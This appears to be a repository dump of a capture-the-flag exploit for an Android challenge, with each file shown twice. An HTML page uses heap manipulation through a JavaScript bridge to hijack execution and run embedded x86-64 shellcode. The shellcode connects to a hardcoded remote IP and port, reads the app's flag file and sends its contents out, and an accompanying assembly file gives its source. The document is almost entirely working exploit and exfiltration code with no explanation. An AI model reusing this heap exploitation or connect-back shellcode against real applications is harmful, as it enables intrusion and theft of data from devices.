tourpran/exploit.html

## exploit.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>babu</title>
</head>
<body>
    <p>bob</p>
    <script>document.write("JS WORKS ? test")</script>
    </body><script>console.log(1234)</script>
    <script type="text/javascript">
        function p64(data){
            const byteArray = new Uint8Array([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
            let i=0
            while(data > 0){
                byteArray[i] = data&0xff
                data = (data - data%256) / 256
                i = i+1
            }
            return String.fromCharCode.apply(String, byteArray)
        }
        function fin(data){
            const byte_array = []
            for (const character of data) {
                const code = character.charCodeAt(0)
                byte_array.push(code)
            }
            return byte_array
        }
        function u64(data){
            return parseInt(data.match(/../g).reverse().join(''), 16)
        }
        pass = "50133tbd5mrt1769"

        // Stage1 - Get the Heap address.
        let h1 = bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x31)))
        let heap = h1-64

        // stage2 - Get allocation on meta data at heap start. pointers.
        let a = bi0sctf.secure_talloc(pass, 0x20, fin("BBBB"))
        let b = bi0sctf.secure_talloc(pass, 0x90, fin("BBBB"))
        console.log("Starting Exploit");
        bi0sctf.secure_tree(pass, a)
        bi0sctf.secure_tree(pass, heap+0x58)
        bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x41) + p64(heap+16)))

        //intermidiate step - later use.
        console.log("reached intermidiate")
        bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(heap+0x28) + p64(0x80)))

        console.log("Stage 3 - middle")
        // stage3 middle step - setup
        bi0sctf.secure_tree(pass, b)
        let yello = bi0sctf.secure_talloc(pass, 0x80, fin(p64(0) + p64(0) + p64(0x30) + p64(0x41410008) + p64(0x41410008) + "XXXXXXXX" ))
        bi0sctf.secure_tree(pass, heap+16)
        bi0sctf.secure_talloc(pass, 0x20, fin(p64(yello+24) + p64(0)))
        bi0sctf.secure_talloc(pass, 0x20, [])

        console.log("Stage - 3")
        // stage3 - Overwrite the run debug to get the pointer to exec region.
        bi0sctf.secure_tree(pass, heap+16)
        bi0sctf.secure_talloc(pass, 0x20, fin(p64(0x41410008+16)))
        let shellcode = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x31\xd2\x0f\x05\x49\x89\xc1\x6a\x2a\x58\x4c\x89\xcf\x52\x52\x68\x7a\xb2\x5d\x60\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\xb8\x02\x00\x00\x00\x41\xb8\x67\x00\x00\x00\x41\x50\x49\xb8\x65\x6e\x67\x65\x2f\x66\x6c\x61\x41\x50\x49\xb8\x69\x64\x2e\x63\x68\x61\x6c\x6c\x41\x50\x49\xb8\x74\x66\x2e\x61\x6e\x64\x72\x6f\x41\x50\x49\xb8\x74\x61\x2f\x62\x69\x30\x73\x63\x41\x50\x49\xb8\x2f\x64\x61\x74\x61\x2f\x64\x61\x41\x50\x48\x89\xe7\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x00\x4c\x89\xcf\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\x6a\x3c\x58\x0f\x05\x2f\x64\x61\x74\x61\x2f\x64\x61\x74\x61\x2f\x62\x69\x30\x73\x63\x74\x66\x2e\x61\x6e\x64\x72\x6f\x69\x64\x2e\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x2f\x66\x6c\x61\x67"
        let shell = bi0sctf.secure_talloc(pass, 0x100 , fin(shellcode))

        console.log("Stage - 4")
        // stage4 - overwrite the debugger with the address of shellcode
        bi0sctf.secure_tree(pass, heap+16)
        bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0) +p64(0x41410018)))

        console.log("Stage - 5")
        // call the shellcode
        bi0sctf.secure_talloc(pass, 0x20, fin(p64(69)))

    </script>
</body>
</html>

## reverse_shell.asm
global _start
section .text

_start:
socket:
	push 0x29
	pop rax
	push 0x02
	pop rdi
	push 0x01
	pop rsi
	xor edx, edx
	syscall

	mov r9, rax

connect:
	push 0x2a
	pop rax

	mov rdi, r9

	; creating sockaddr data structure
	push rdx			; pushing padding
	push rdx

	push 0x41414141     ; pushing INADDR_ANY
	push word 0x3905	; pushing PORT
	push word 0x0002	; pushing AF_INET

	mov rsi, rsp
	add rdx, 0x10
	syscall

open:
	mov rax, 2
	mov r8, 0x0000000000000067
	push r8
	mov r8, 0x616c662f65676e65
	push r8
	mov r8, 0x6c6c6168632e6469
	push r8
	mov r8, 0x6f72646e612e6674
	push r8
	mov r8, 0x63733069622f6174
	push r8
	mov r8, 0x61642f617461642f
	push r8
	mov rdi, rsp
	mov rsi, 0
	mov rdx, 0
	syscall

read:
	mov rdi, rax
	mov rax, 0
	mov rsi, rsp
	mov rdx, 0x50
	syscall

write:
    mov rax, 0x1
    mov rdi, r9
    mov rsi, rsp
    mov rdx, 0x50
    syscall

finish:
	push 0x3c
	pop rax
	syscall

path: db "/data/data/bi0sctf.android.challenge/flag", 0
	<!DOCTYPE html>
	<html lang="en">
	<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>babu</title>
	</head>
	<body>
	<p>bob</p>
	<script>document.write("JS WORKS ? test")</script>
	</body><script>console.log(1234)</script>
	<script type="text/javascript">
	function p64(data){
	const byteArray = new Uint8Array([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
	let i=0
	while(data > 0){
	byteArray[i] = data&0xff
	data = (data - data%256) / 256
	i = i+1
	}
	return String.fromCharCode.apply(String, byteArray)
	}
	function fin(data){
	const byte_array = []
	for (const character of data) {
	const code = character.charCodeAt(0)
	byte_array.push(code)
	}
	return byte_array
	}
	function u64(data){
	return parseInt(data.match(/../g).reverse().join(''), 16)
	}
	pass = "50133tbd5mrt1769"

	// Stage1 - Get the Heap address.
	let h1 = bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x31)))
	let heap = h1-64

	// stage2 - Get allocation on meta data at heap start. pointers.
	let a = bi0sctf.secure_talloc(pass, 0x20, fin("BBBB"))
	let b = bi0sctf.secure_talloc(pass, 0x90, fin("BBBB"))
	console.log("Starting Exploit");
	bi0sctf.secure_tree(pass, a)
	bi0sctf.secure_tree(pass, heap+0x58)
	bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x41) + p64(heap+16)))

	//intermidiate step - later use.
	console.log("reached intermidiate")
	bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(heap+0x28) + p64(0x80)))

	console.log("Stage 3 - middle")
	// stage3 middle step - setup
	bi0sctf.secure_tree(pass, b)
	let yello = bi0sctf.secure_talloc(pass, 0x80, fin(p64(0) + p64(0) + p64(0x30) + p64(0x41410008) + p64(0x41410008) + "XXXXXXXX" ))
	bi0sctf.secure_tree(pass, heap+16)
	bi0sctf.secure_talloc(pass, 0x20, fin(p64(yello+24) + p64(0)))
	bi0sctf.secure_talloc(pass, 0x20, [])

	console.log("Stage - 3")
	// stage3 - Overwrite the run debug to get the pointer to exec region.
	bi0sctf.secure_tree(pass, heap+16)
	bi0sctf.secure_talloc(pass, 0x20, fin(p64(0x41410008+16)))
	let shellcode = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x31\xd2\x0f\x05\x49\x89\xc1\x6a\x2a\x58\x4c\x89\xcf\x52\x52\x68\x7a\xb2\x5d\x60\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\xb8\x02\x00\x00\x00\x41\xb8\x67\x00\x00\x00\x41\x50\x49\xb8\x65\x6e\x67\x65\x2f\x66\x6c\x61\x41\x50\x49\xb8\x69\x64\x2e\x63\x68\x61\x6c\x6c\x41\x50\x49\xb8\x74\x66\x2e\x61\x6e\x64\x72\x6f\x41\x50\x49\xb8\x74\x61\x2f\x62\x69\x30\x73\x63\x41\x50\x49\xb8\x2f\x64\x61\x74\x61\x2f\x64\x61\x41\x50\x48\x89\xe7\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x00\x4c\x89\xcf\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\x6a\x3c\x58\x0f\x05\x2f\x64\x61\x74\x61\x2f\x64\x61\x74\x61\x2f\x62\x69\x30\x73\x63\x74\x66\x2e\x61\x6e\x64\x72\x6f\x69\x64\x2e\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x2f\x66\x6c\x61\x67"
	let shell = bi0sctf.secure_talloc(pass, 0x100 , fin(shellcode))

	console.log("Stage - 4")
	// stage4 - overwrite the debugger with the address of shellcode
	bi0sctf.secure_tree(pass, heap+16)
	bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0) +p64(0x41410018)))

	console.log("Stage - 5")
	// call the shellcode
	bi0sctf.secure_talloc(pass, 0x20, fin(p64(69)))

	</script>
	</body>
	</html>
	global _start
	section .text

	_start:
	socket:
	push 0x29
	pop rax
	push 0x02
	pop rdi
	push 0x01
	pop rsi
	xor edx, edx
	syscall

	mov r9, rax

	connect:
	push 0x2a
	pop rax

	mov rdi, r9

	; creating sockaddr data structure
	push rdx ; pushing padding
	push rdx

	push 0x41414141 ; pushing INADDR_ANY
	push word 0x3905 ; pushing PORT
	push word 0x0002 ; pushing AF_INET

	mov rsi, rsp
	add rdx, 0x10
	syscall

	open:
	mov rax, 2
	mov r8, 0x0000000000000067
	push r8
	mov r8, 0x616c662f65676e65
	push r8
	mov r8, 0x6c6c6168632e6469
	push r8
	mov r8, 0x6f72646e612e6674
	push r8
	mov r8, 0x63733069622f6174
	push r8
	mov r8, 0x61642f617461642f
	push r8
	mov rdi, rsp
	mov rsi, 0
	mov rdx, 0
	syscall

	read:
	mov rdi, rax
	mov rax, 0
	mov rsi, rsp
	mov rdx, 0x50
	syscall

	write:
	mov rax, 0x1
	mov rdi, r9
	mov rsi, rsp
	mov rdx, 0x50
	syscall

	finish:
	push 0x3c
	pop rax
	syscall

	path: db "/data/data/bi0sctf.android.challenge/flag", 0